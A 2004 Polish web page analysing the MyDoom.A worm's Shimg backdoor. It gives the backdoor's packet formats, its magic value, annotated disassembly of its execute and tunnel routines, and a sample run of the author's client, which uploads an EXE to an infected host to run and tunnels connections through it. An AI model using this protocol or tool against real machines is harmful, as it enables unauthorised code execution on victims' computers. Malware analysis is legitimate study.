POWROT DO STRONY GLOWNEJ

Informacje podane na tej stronie mają służyć wyłącznie do celów edukacyjnych.

Analiza wirusa W32.MyDoom.A

Copyright © 2004   Robert Nowotniak

Kod źródłowy: https://github.com/rnowotniak/mydoom-client2004/.

Dnia 27 stycznia 2004 dostałem wiele podobnie wyglądających maili od nieznanych nadawców - wszystkie z załącznikami w postaci plików exe. Wkrótce okazało się, że jest to za sprawą wirusa W32.MyDoom.A. Jego działanie zaciekawiło mnie, a to, co o nim ustaliłem, umieściłem na tej stronie..
Krótki opis wirusa

Koń trojański Shimg (instalowany przez MyDoom.A i mutacje) standardowo nasłuchuje na porcie 3127 (lub wyższe) w oczekiwaniu na jedno z dwu żądań: uruchomienie przesłanego pliku wykonywalnego lub ustanowienie tunelowanego połączenia z trzecim hostem.

Kod serwera jest przechowywany w bibliotece system/shimgapi.dll (4096 bajtów) w katalogu Windows. Wirus dodaje wpis w rejestrze o kluczu: HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32, co powoduje automatyczne ładowanie biblioteki w czasie startu powłoki systemowej Explorer.exe.

Plik wykonywalny, rozsyłany przez wirusa, jest spakowany UPX, podobnie jak biblioteka Shimg. Ponadto wszystkie łańcuchy znaków - szablony maili, komendy SMTP, zmieniane klucze rejestru, omijane adresy... - są zakodowane ROT13. W szczególności, można tam dostrzec pozostawiony tag systemu kontroli rewizji (sync.c,v 0.1 2004/01/xx xx:xx:xx andy) - w pliku dll znajduje się także 884-znakowy ciąg powtarzających się liter SYNC, ale chyba nie jest do niczego wykorzystywany.


Format pakietów jest następujący:


Tunelowanie połączeń
0000000: 0401 0fc8 c0a8 4201 00 474554202f2048  ......B..GET / H
     ^^1^ ^^2^ ^^^^3^^^^ ^4 ^^^^^^^^5^^^^^
0000010: 5454 502f 312e 310a 486f 7374 3a20 7777 TTP/1.1.Host: ww
0000020: 772e 6d69 6372 6f73 6f66 742e 636f 6d0a w.microsoft.com.
 sent 0, rcvd 49

1 -- 2 bajty, żądanie ustanowienia tunelu [\x04\x01]
2 -- 2 bajty, docelowy port w porządku sieciowym
3 -- 4 bajty, docelowy adres IP w porządku sieciowym
4 -- 1 bajt,  separator żądania od tunelowanych danych [\x00]
5 --      dane do przesłania ustanowionym tunelem

Zdalne wykonywanie kodu programu
0000000: 85 133c9ea2 4d5a900003000000040000    ..<..MZ.........
     ^1 ^^^^2^^^ ^^^^^^^^^^^3^^^^^^^^^^
0000010: 00ff ff00 00b8 0000 0000 0000 0040 0000 .............@..
[...]
0000050: 4ccd 2154 6869 7320 7072 6f67 7261 6d20 L.!This program 
0000060: 6361 6e6e 6f74 2062 6520 7275 6e20 696e cannot be run in
0000070: 2044 4f53 206d 6f64 652e 0d0d 0a24 0000  DOS mode....$..

1 -- 1 bajt,  żądanie wykonania przesłanego programu [\x85]
2 -- 4 bajty, liczba potwierdzająca [\x13\x3C\x9E\xA2]
3 --      dane zawierające program do uruchomienia


Część kodu wirusa wraz z komentarzami


; Funkcja trojanowania (uruchamianie zapodanej binarki)

 SUB_L7E1A14D0:
   push ebp        ;
   mov  ebp,esp      ; prolog funkcji
   sub  esp,00000664h   ;

   push esi
   xor  esi,esi
   push edi
   mov  edi,[WSOCK32.dll!WSOCK32.16]   ; włożenie &recv do rejestru edi
   push esi
   lea  eax,[ebp-08h]
   push 00000001h             ; len = 1
   push eax
   push [ebp+08h]
   mov  [ebp-04h],esi
   call edi                ; recv() - wczytanie bajtu \x85
   push esi
   lea  eax,[ebp-08h]
   push 00000004h
   push eax
   push [ebp+08h]
   call edi
   push [ebp-08h]
   call [WSOCK32.dll!WSOCK32.14]      ; ntohl()

   cmp  eax,133C9EA2h           ;
   mov  [ebp-08h],eax           ; Kolejne cztery bajty muszą być ,,133C9EA2''
   jnz  L7E1A1645             ;

   lea  eax,[ebp-00000264h]
   push eax
   push 00000104h
   call [KERNEL32.DLL!GetTempPathA]    ;
   lea  eax,[ebp-00000160h]        ;
   push eax                ;
   push esi                ; ustalanie tymczasowej ścieżki
   lea  eax,[ebp-00000264h]        ;
   push L7E1A1440             ;
   push eax                ;
   call [KERNEL32.DLL!GetTempFileNameA]  ;
   push esi
   push 00000080h
   push 00000002h
   push esi
   push 00000001h
   lea  eax,[ebp-00000160h]
   push 40000000h
   push eax                ;
   call [KERNEL32.DLL!CreateFileA]     ; Utworzenie pliku
   cmp  eax,esi              ;
   mov  [ebp-04h],eax
   jz  L7E1A1642
   cmp  eax,FFFFFFFFh
   jz  L7E1A1642
   push ebx
   mov  ebx,00000400h
   jmp  L7E1A1590
 L7E1A157A:
   lea  ecx,[ebp-08h]
   push esi
   push ecx
   push eax
   lea  eax,[ebp-00000664h]
   push eax
   push [ebp-04h]             ;
   call [KERNEL32.DLL!WriteFile]      ; Wpisanie treści nadesłanego pliku EXE
 L7E1A1590:                  ;
   push esi
   lea  eax,[ebp-00000664h]
   push ebx
   push eax
   push [ebp+08h]
   call edi
   cmp  eax,esi
   jg  L7E1A157A
   push [ebp-04h]
   mov  edi,[KERNEL32.DLL!CloseHandle]   ; Zamknięcie
   call edi
   push 00000044h
   lea  eax,[ebp-5Ch]
   pop  ebx
   push ebx
   push esi
   push eax
   call SUB_L7E1A1CD0
   xor  eax,eax
   mov  [ebp-5Ch],ebx
   inc  eax
   mov  dword ptr [ebp-30h],00000087h
   mov  [ebp-40h],eax
   mov  [ebp-44h],eax
   lea  eax,[ebp-00000160h]
   mov  [ebp-48h],esi
   push eax
   lea  eax,[ebp-00000664h]
   push SSZ7E1A1438___s_
   push eax
   mov  [ebp-4Ch],esi
   mov  [ebp-2Ch],si
   call [USER32.dll!wsprintfA]
   add  esp,00000018h
   lea  eax,[ebp-18h]
   push eax
   lea  eax,[ebp-5Ch]
   push eax
   push esi
   push esi                ;
   push esi                ;
   push esi                ;
   push esi                ;
   lea  eax,[ebp-00000664h]        ;
   push esi                ;
   push eax                ;
   push esi                ; Uruchomienie przysłanego pliku EXE
   call [KERNEL32.DLL!CreateProcessA]   ;
   test eax,eax              ;
   pop  ebx
   jz  L7E1A1645
   push FFFFFFFFh
   push [ebp-18h]
   call [KERNEL32.DLL!WaitForSingleObject]
   push [ebp-14h]
   call edi
   push [ebp-18h]
   call edi
   lea  eax,[ebp-00000160h]
   push eax
   call [KERNEL32.DLL!DeleteFileA]     ; Usunięcie pliku
   push [ebp+08h]
   call [WSOCK32.dll!WSOCK32.3]
   jmp  L7E1A1660
 L7E1A1642:
   mov  [ebp-04h],esi
 L7E1A1645:
   push [ebp+08h]
   call [WSOCK32.dll!WSOCK32.3]      ; closesocket()
   cmp  [ebp-04h],esi
   jz  L7E1A1660
   lea  eax,[ebp-00000160h]
   push eax
   call [KERNEL32.DLL!DeleteFileA]
 L7E1A1660:
   pop  edi
   pop  esi
   leave
   retn
;------------------------------------------------------------------------------
 SUB_L7E1A1664:
   push ebp
   mov  ebp,esp
   sub  esp,0000012Ch
   push esi
   push edi
   xor  edi,edi
 L7E1A1671:
   lea  esi,[ebp+edi-0000012Ch]
   push 00000000h
   push 00000001h        ; len == 1
   push esi           ; odłożenie esi - jest w nim wskaźnik na bufor
   push [ebp+08h]        ; deskryptor
   call [WSOCK32.dll!WSOCK32.16] ; recv()
   test eax,eax
   jle  L7E1A16BF        ; skok gdy recv() <= 0
   cmp  byte ptr [esi],00h    ; czy wczytany bajt to \x00
   jz  L7E1A1698        ; ...skok, jeśli tak
   inc  edi
   cmp  edi,000000FFh
   jc  L7E1A1671
 L7E1A1698:
   lea  eax,[ebp-0000012Ch]
   push eax
   call [WSOCK32.dll!WSOCK32.10] ; inet_addr()
   test eax,eax
   jz  L7E1A16AE        ; skok, gdy inet_addr zawiodło
   cmp  eax,FFFFFFFFh
   jnz  L7E1A16CB        ; skok, gdy IP != 255.255.255.255
 L7E1A16AE:
   lea  eax,[ebp-0000012Ch]
   push eax
   call [WSOCK32.dll!WSOCK32.52] ; gethostbyname()
   test eax,eax
   jnz  L7E1A16C4        ; skok, jeśli gethostbyname() != 0
 L7E1A16BF:
   xor  eax,eax
   inc  eax
   jmp  L7E1A16CF
 L7E1A16C4:
   mov  eax,[eax+0Ch]  ;tu jest jakaś zawiła dereferencja
   mov  eax,[eax]    ;(pewnie wyłuskanie adresu ze struct hostenv)
   mov  eax,[eax]
 L7E1A16CB:
   mov  [ebx],eax
   xor  eax,eax
 L7E1A16CF:
   pop  edi
   pop  esi
   leave
   retn
;------------------------------------------------------------------------------
 SUB_L7E1A16D3:
   push ebp
   mov  ebp,esp
   mov  eax,00001104h
   call SUB_L7E1A1D30
   push ebx
   push esi
   mov  esi,[WSOCK32.dll!WSOCK32.16] ; recv()
   push edi
   xor  ebx,ebx
   mov  edi,00001000h
 L7E1A16F0:
   mov  eax,[ebp+08h]
   xor  ecx,ecx
   inc  ecx
   mov  [ebp-00000100h],eax
   mov  [ebp-00000104h],ecx
   xor  eax,eax
 L7E1A1704:
   mov  edx,[ebp+0Ch]
   cmp  [ebp+eax*4-00000100h],edx
   jz  L7E1A1715
   inc  eax
   cmp  eax,ecx
   jc  L7E1A1704
 L7E1A1715:
   cmp  eax,ecx
   jnz  L7E1A1729
   mov  [ebp-000000FCh],edx
   mov  dword ptr [ebp-00000104h],00000002h
 L7E1A1729:
   push ebx
   push ebx
   lea  eax,[ebp-00000104h]
   push ebx
   push eax
   push ebx
   call [WSOCK32.dll!WSOCK32.18]    ; select()
   test eax,eax
   jle  L7E1A17B5
   lea  eax,[ebp-00000104h]
   push eax
   push [ebp+08h]
   call jmp_WSOCK32.dll!WSOCK32.151
   test eax,eax
   jz  L7E1A1775
   push ebx
   lea  eax,[ebp-00001104h]
   push edi
   push eax
   push [ebp+08h]
   call esi
   cmp  eax,ebx
   jle  L7E1A17B5
   push ebx
   push eax
   lea  eax,[ebp-00001104h]
   push eax
   push [ebp+0Ch]
   call [WSOCK32.dll!WSOCK32.19] ; send()
 L7E1A1775:
   lea  eax,[ebp-00000104h]
   push eax
   push [ebp+0Ch]
   call jmp_WSOCK32.dll!WSOCK32.151
   test eax,eax
   jz  L7E1A16F0
   push ebx
   lea  eax,[ebp-00001104h]
   push edi
   push eax
   push [ebp+0Ch]
   call esi
   cmp  eax,ebx
   jle  L7E1A17B5
   push ebx
   push eax
   lea  eax,[ebp-00001104h]
   push eax
   push [ebp+08h]
   call [WSOCK32.dll!WSOCK32.19] ; send()
   jmp  L7E1A16F0
 L7E1A17B5:
   pop  edi
   pop  esi
   pop  ebx
   leave
   retn
;------------------------------------------------------------------------------
 SUB_L7E1A17BA:
   push ebp        ;
   mov  ebp,esp      ; prolog funkcji
   sub  esp,00000020h   ;

   or dword ptr [ebp-08h],FFFFFFFFh
   push esi
   mov  esi,[WSOCK32.dll!WSOCK32.16] ; wstawienie adresu recv() do esi

   push 00000002h          ; Ustawienie flagi MSG_PEEK dla recv()
                     ;  [nieblokujące ,,spojrzenie'']

   lea  eax,[ebp-01h]        ; obliczenie wskaźnika na bufor
   push 00000001h          ; len == 1
   push eax             ; bufor
   push [ebp+08h]          ; deskryptor gniazda klienckiego
   call esi             ; recv()

   cmp  eax,00000001h        ;
   jnz  L7E1A1908          ; skok na koniec f-kcji, gdy ilość wczytanych bajtów != 1
   cmp  byte ptr [ebp-01h],85h    ;
   jnz  L7E1A17F5          ; skok, gdy bajt != \x85

   push [ebp+08h]          ; jest \x85,
   call SUB_L7E1A14D0        ; ...zatem funkcja trojanowania
   pop  ecx
   jmp  L7E1A1908

 L7E1A17F5:
   cmp  byte ptr [ebp-01h],04h    ; czy jest bajt 0x04 (forwarding)
   push ebx
   jnz  L7E1A18B7          ; skok gdy bajt to nie 0x04
   xor  ebx,ebx

 L7E1A1802:
   push 00000000h
   push 00000008h
   pop  eax
   sub  eax,ebx
   push eax         ; wczytać 8 bajtów
   lea  eax,[ebp+ebx-10h]
   push eax         ; adres bufora, dokąd wczytać
   push [ebp+08h]      ; położenie deskryptora gniazda
   call esi         ; recv()
   test eax,eax
   jl  L7E1A1823      ; czy ret < 0
   jz  L7E1A1825      ; czy ret == 0
   add  ebx,eax
   cmp  ebx,00000008h    ; czy wczytano 8
   jl  L7E1A1802      ; ..jeśli mniej, to pętla - wczytywać dalej
   jmp  L7E1A1825
 L7E1A1823:
   mov  ebx,eax
 L7E1A1825:
   cmp  ebx,00000008h    ; czy wczytano 8
   jnz  L7E1A1907      ; skok, jeśli nie 8
   jmp  L7E1A1836
 L7E1A1830:
   cmp  byte ptr [ebp-02h],00h  ; porównanie wczytanego bajtu
   jz  L7E1A184A         ; ...i skok, jeśli jest on \x00
 L7E1A1836:              ; wczytanie bajtu z gniazda
   push 00000000h         ; flagi recv
   lea  eax,[ebp-02h]
   push 00000001h         ; len = 1 bajt
   push eax            ; wskaźnik na bufor
   push [ebp+08h]         ; deskryptor
   call esi            ; recv()
   cmp  eax,00000001h
   jz  L7E1A1830         ; skok jeśli wczytano 1 (tyle zamierzano)
   jmp  L7E1A18B7
 L7E1A184A:
   cmp  byte ptr [ebp-10h],04h  ; sprawdzenie czy pierwszy bajt oktetu to \x04
   jnz  L7E1A18B7
   cmp  byte ptr [ebp-0Fh],01h  ; sprawdzenie czy następuje \x01
   jnz  L7E1A18B7
   cmp  dword ptr [ebp-0Ch],00000000h ; sprawdzenie, czy IP to 0.0.0.0
   jz  L7E1A187C           ; ...skok, jeśli tak
   push [ebp-0Ch]           ; odłożenie wskaźnika na IP na stos
   call [WSOCK32.dll!WSOCK32.8]    ; htonl() - zamiana na porządek sieciowy
   test eax,FFFFFF00h
   jnz  L7E1A187C           ; skok, jeśli adresem było 255.255.255.0
   push [ebp+08h]           ; odłożenie adresu deskryptora
   lea  ebx,[ebp-0Ch]         ; wskaźnik na IP
   call SUB_L7E1A1664
   test eax,eax
   pop  ecx
   jnz  L7E1A18B7
 L7E1A187C:
   mov  ax,[ebp-0Eh]         ; port docelowy
   push 00000006h           ; 6 to protokół TCP
   mov  [ebp-1Eh],ax         ; port
   mov  eax,[ebp-0Ch]         ; adres docelowy
   push 00000001h           ; 1 to typ SOCK_STREAM
   push 00000002h           ; 2 to rodzina AF_INET
   mov  word ptr [ebp-20h],0002h
   mov  [ebp-1Ch],eax
   call [WSOCK32.dll!WSOCK32.23] ; socket()
   cmp  eax,FFFFFFFFh      ; czy ret == -1
   mov  [ebp-08h],eax
   jz  L7E1A18B7        ; ..skok jeśli socket() == -1
   lea  eax,[ebp-20h]
   push 00000010h
   push eax
   push [ebp-08h]
   call [WSOCK32.dll!WSOCK32.4] ; connect() - ustanawianie połączenia
   test eax,eax
   jz  L7E1A18D2        ; skok, jeśli connect() == 0 (poszło OK)
 L7E1A18B7:             ; jest błąd - wysłanie ,,[''
   push 00000000h
   lea  eax,[ebp-10h]
   push 00000008h
   push eax
   push [ebp+08h]
   mov  byte ptr [ebp-10h],04h
   mov  byte ptr [ebp-0Fh],5Bh  ; 5B to kod znaku ,,[''
   call [WSOCK32.dll!WSOCK32.19] ; send()
   jmp  L7E1A18F8

  ;
  ; Udało się zestawić tunelowane połączenie
  ;
 L7E1A18D2:
   push 00000000h
   lea  eax,[ebp-10h]
   push 00000008h
   push eax
   push [ebp+08h]
   mov  byte ptr [ebp-10h],04h
   mov  byte ptr [ebp-0Fh],5Ah  ; 5A to kod znaku ,,Z''
   call [WSOCK32.dll!WSOCK32.19] ; send()
   push [ebp-08h]
   push [ebp+08h]
   call SUB_L7E1A16D3      ; obsługa tunelu
   pop  ecx
   pop  ecx
 L7E1A18F8:
   cmp  dword ptr [ebp-08h],FFFFFFFFh
   jz  L7E1A1907
   push [ebp-08h]
   call [WSOCK32.dll!WSOCK32.3] ; closesocket()
 L7E1A1907:
   pop  ebx
 L7E1A1908:
   push [ebp+08h]
   call [WSOCK32.dll!WSOCK32.3] ; closesocket()
   pop  esi
   leave
   retn
;------------------------------------------------------------------------------
 L7E1A1914:
   push esi
   mov  esi,[KERNEL32.DLL!GetTickCount]
   push edi
   xor  edi,edi
 L7E1A191E:
   push 00000000h        ; wskaźnik na struct sockaddr jest NULL
   push 00000000h        ; j.w. ale dla struct addrlen
   push [esp+14h]        ; deskryptor gniazda serwerowego
   call [WSOCK32.dll!WSOCK32.1] ; accept()
   test eax,eax
   jz  L7E1A191E        ;
   cmp  eax,FFFFFFFFh      ; pętla tak długo, gdy accept() == 0 lub -1
   jz  L7E1A191E        ;
   inc  [L7E1A1D70]       ; jakiś licznik jednoczesnych połączeń (chyba maks. 3)
   push eax
   call SUB_L7E1A17BA      ; funkcja obsługi ,,klienta''
   dec  [L7E1A1D70]       ; dekrementacja licznika
   pop  ecx
   call esi
   sub  eax,edi
   cmp  eax,00000014h
   jnc  L7E1A1959
   push 00000032h
   call [KERNEL32.DLL!Sleep]
 L7E1A1959:
   call esi
   mov  edi,eax
   jmp  L7E1A191E        ; wykonywanie tego wszystkiego w pętli
 SUB_L7E1A195F:
   mov  eax,[esp+04h]
   jmp  L7E1A196C
 L7E1A1965:
   cmp  cl,[esp+08h]
   jz  L7E1A1972
   inc  eax
 L7E1A196C:
   mov  cl,[eax]
   test cl,cl
   jnz  L7E1A1965
 L7E1A1972:
   mov  cl,[eax]
   sub  cl,[esp+08h]
   neg  cl
   sbb  ecx,ecx
   not  ecx
   and  eax,ecx
   retn

Mój program w C - klient trojana Shimg (z Mydoom)

Zasada działania programu jest przedstawiona na schemacie poniżej:
                  *--------*       *----------*
    *------>------------------->| Victim | ---->------->| Internet |
    |          *------>|    |     |  *----------*
    |          |    *--------*     |  *-------------------*
*-----------*     *-------*           *-->| www.microsoft.com |
| Psotnik  |----->--->| Proxy |   *---------*     *-------------------*
|      |<-*    *-------*  *--| Klienci |
*-----------* |          | *---------*
        *------<---------<--*
   

Program umożliwia wykrycie Shimg, uruchomienie dowolnego programu na atakowanym systemie, a także zestawienie połączenia z dowolnym adresem (w protokole TCP/IP) za pośrednictwem zainfekowanego komputera. Opcjonalnie wszystkie działania mogą być przeprowadzane przez serwer proxy, który musi udostępniać metodę CONNECT. Program może wyczekiwać na wybranym porcie na połączenia klientów i automatycznie zestawiać połączenie przez zainfekowany system.

Argumenty linii poleceń:
./MyDoom [-t] [[-l <adres[:port]>] -f <Adres_Docelowy[:port]>]
    [-p <Proxy[:port]>] [-r <Plik.exe>] <Cel_Ataku[:port]>

 -t  Sprawdzenie, czy w podanej lokalizacji działa trojan MyDoom (shimg)
 -f  Zestawienie tunelowanego połączenia z Adresem_Docelowym (forwarding)
 -r  Uruchomienie podanego <Pliku.exe> na atakowanym komputerze
 -p  Wykonywanie wszyskich działań przez proxy (metoda CONNECT)
 -l  Nasłuchiwanie na porcie w celu tunelowania
	 
Kod programu można pobrać tutaj:
mydoom.c


A to wszystko działa mniej więcej tak...
$ ./MyDoom -p PROX -r code.exe -l ox2:50881 -f www.ibm.com:80 -t <VVV.VVV.VVV.VVV>

--------------------------------------------------
****     klient MyDoom.c (shimg)     *****
****    nie 01 lut 2004 21:27:20 CET   *****
**** Robert Nowotniak <rob@submarine.ath.cx> *****
--------------------------------------------------
*** Program _WYŁĄCZNIE_ do celów edukacyjnych. ***
--------------------------------------------------

[i] Nazwa PROX wskazuje na adres <PPP.PPP.PPP.PPP>
[*] Sprawdzanie dostępności portu 3127 na serwerze <VVV.VVV.VVV.VVV>...
[i] Łączenie z proxy...
[i] Serwer proxy ustanowił połączenie.
[i] Odpowiedź od serwera:
[i] 0x4 0x5B 0x0 0x0 0x0 0x0 0x0 0x0
[!] W podanym położeniu działa trojan MyDoom (shimg).
[*] Wysyłanie pliku (code.exe) do uruchomienia przez trojana...
[!] OK. Plik został przesłany na podany adres.
[i] Nazwa ox2 wskazuje na adres <AAA.AAA.AAA.AAA>
[*] Oczekiwanie na połączenie klienta...
[i] Nadeszło połączenie z <KKK.KKK.KKK.KKK>:33091...
[i] Nazwa www.ibm.com wskazuje na adres 129.42.16.99
[*] Ustanawianie połączenia z 129.42.16.99:80 poprzez <VVV.VVV.VVV.VVV>:3127...
[i] Łączenie z proxy...
[i] Serwer proxy ustanowił połączenie.
[!] Trojan Shimg odpowiedział, że nawiązał połączenie.

ox2 [AAA.AAA.AAA.AAA] 50881 (?) open
HEAD / HTTP/1.1
Host: www.ibm.com

HTTP/1.1 302 Found
Date: Mon, 09 Feb 2004 20:25:47 GMT
Server: IBM_HTTP_SERVER/1.3.26 Apache/1.3.26 (Unix)
Location: http://www.ibm.com/us/
Content-Type: text/html

 sent 35, rcvd 172

[*] Połączenie zostało zamknięte.

$ _


POWROT DO STRONY GLOWNEJ